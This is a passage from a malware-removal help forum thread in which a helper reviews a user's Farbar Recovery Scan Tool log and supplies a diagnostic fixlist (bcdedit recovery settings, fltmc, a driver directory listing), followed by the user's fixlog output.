S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 a48h1yy9; C:\Windows\System32\Drivers\a48h1yy9.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-21 20:47 - 2018-03-21 20:47 - 000002759 _____ C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
2018-03-21 20:47 - 2018-03-21 20:47 - 000000000 ____D C:\ProgramData\Sophos
2018-03-21 20:47 - 2018-03-21 20:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2018-03-21 20:47 - 2018-03-21 20:47 - 000000000 ____D C:\Program Files (x86)\Sophos
2018-03-19 19:58 - 2018-03-19 20:33 - 000000000 ____D C:\ProgramData\RogueKiller
2018-03-19 19:58 - 2018-03-19 19:58 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2018-03-19 19:57 - 2018-03-19 19:57 - 000000867 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\Program Files\RogueKiller
2018-03-18 09:03 - 2018-03-22 06:55 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-22 06:53 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-22 06:53 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-20 17:00 - 001661758 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-22 06:53 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-21 20:43 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-20 20:10 - 2009-07-14 06:08 - 000032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-19 20:07 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 20:07 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-19 19:58 - 2018-01-12 17:33 - 001665384 _____ (Microsoft Corporation) C:\Users\Martin\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe
[2018-01-05 13:05] - [2018-01-01 02:50] - 000455680 _____ (Microsoft Corporation) 11D6A262B617130F7C16E308C12E0D41

C:\Windows\system32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\system32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\system32\services.exe => MD5 is legit
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\system32\rpcss.dll
[2018-01-05 13:05] - [2018-01-01 03:18] - 000512000 _____ (Microsoft Corporation) BA6C9EE518A11DA4AD061B223EBED3D3

C:\Windows\system32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\system32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================

Attached Files



#12 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 22 March 2018 - 07:19 AM


Hi,


Your version of the Farbar tool is not being updated. All logs are dated 14.03.2018
Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
===

The bad Zero File on your last log has changed again.

===

To continue and proceed, you will need access to a spare PC and a USB flash drive that has not been in contact with the sick PC... Please confirm that you have option.

To see if you can run the following to enable Recovery Environment...

Please confirm that you have option.
<<<

Now, Open FRST on the compromised computer:

copy/paste the following inside the text area of FRST. Once done, click on the Fix button. A file called fixlog.txt should appear on your desktop. Attach it in your next reply.

Start::
CMD: bcdedit.exe /set {bootmgr} displaybootmenu yes
CMD: bcdedit.exe /set {default} recoveryenabled yes
CMD: fltmc instances
CMD: dir /a:-d /o:d C:\windows\system32\drivers
End::

https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=http://i121.photobucket.com/albums/o239/kevinf80/Farbar%2520Tools/frst%2520b.jpg&key=98f8e4fa906452a8ed54423fd0407a3d120fe6064437244ca29c06ed5f968755


Post the fixlog.txt and wait for further instructions.
<<<>>>

#13 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 22 March 2018 - 12:14 PM

Hello!

Yeah, FRST does not update. No programs do. I'm guessing it's because a lot of services are disabled, if I look in msconfig. Since I haven't had internet connection this entire time, I've done it all with the help of another computer.

 

If you don't mind me asking, how are we doing so far? Have any progress been made? It's hard for me to tell, since I'm very unknowledgeable when it comes to malware.

 

Here's the fixlog from FRST:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (22-03-2018 18:12:49) Run:4
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CMD: bcdedit.exe /set {bootmgr} displaybootmenu yes
CMD: bcdedit.exe /set {default} recoveryenabled yes
CMD: fltmc instances
CMD: dir /a:-d /o:d C:\windows\system32\drivers

*****************


========= bcdedit.exe /set {bootmgr} displaybootmenu yes =========

The operation completed successfully.

========= End of CMD: =========


========= bcdedit.exe /set {default} recoveryenabled yes =========

The operation completed successfully.

========= End of CMD: =========


========= fltmc instances =========

Filter                Volume Name                              Altitude        Instance Name      Frame  VlStatus
--------------------  -------------------------------------  ------------  ---------------------  -----  --------
MpFilter              \Device\Mup                             328000       MpFilter Instance        0    
MpFilter              C:                                      328000       MpFilter Instance        0    
MpFilter              D:                                      328000       MpFilter Instance        0    
MpFilter                                                      328000       MpFilter Instance        0    
MpFilter              H:                                      328000       MpFilter Instance        0    
luafv                 C:                                      135000       luafv                    0    
FileInfo              \Device\Mup                              45000       FileInfo                 0    
FileInfo              C:                                       45000       FileInfo                 0    
FileInfo              D:                                       45000       FileInfo                 0    
FileInfo                                                       45000       FileInfo                 0    
FileInfo              H:                                       45000       FileInfo                 0    

========= End of CMD: =========


========= dir /a:-d /o:d C:\windows\system32\drivers =========

 Volume in drive C is Structure
 Volume Serial Number is 181D-E218

 Directory of C:\windows\system32\drivers

2007-02-16  01:57            40ÿ648 ElbyCDFL.sys
2009-02-17  18:11            31ÿ400 ElbyCDIO.sys
2009-03-18  17:35            33ÿ856 hamachi.sys
2009-06-10  21:30         3ÿ440ÿ660 gm.dls
2009-06-10  21:30               646 gmreadme.txt
2009-06-10  21:31            31ÿ232 hcw85cir.sys
2009-06-10  21:34           270ÿ848 b57nd60a.sys
2009-06-10  21:34           468ÿ480 bxvbda.sys
2009-06-10  21:34         3ÿ286ÿ016 evbda.sys
2009-06-10  21:37            23ÿ040 secdrv.sys
2009-06-10  21:41            18ÿ432 BrFiltLo.sys
2009-06-10  21:41             8ÿ704 BrFiltUp.sys
2009-06-10  21:41            47ÿ104 BrSerWdm.sys
2009-06-10  21:41            14ÿ976 BrUsbMdm.sys
2009-06-10  21:41            14ÿ720 BrUsbSer.sys
2009-06-10  21:48           426ÿ496 spsys.sys
2009-07-14  00:19            60ÿ416 processr.sys
2009-07-14  00:19            60ÿ928 amdppm.sys
2009-07-14  00:19            64ÿ512 amdk8.sys
2009-07-14  00:19            62ÿ464 intelppm.sys
2009-07-14  00:19             6ÿ144 null.sys
2009-07-14  00:19            92ÿ160 cdfs.sys
2009-07-14  00:19            26ÿ112 msfs.sys
2009-07-14  00:19            44ÿ032 npfs.sys
2009-07-14  00:19           105ÿ472 i8042prt.sys
2009-07-14  00:25            34ÿ304 filetrace.sys
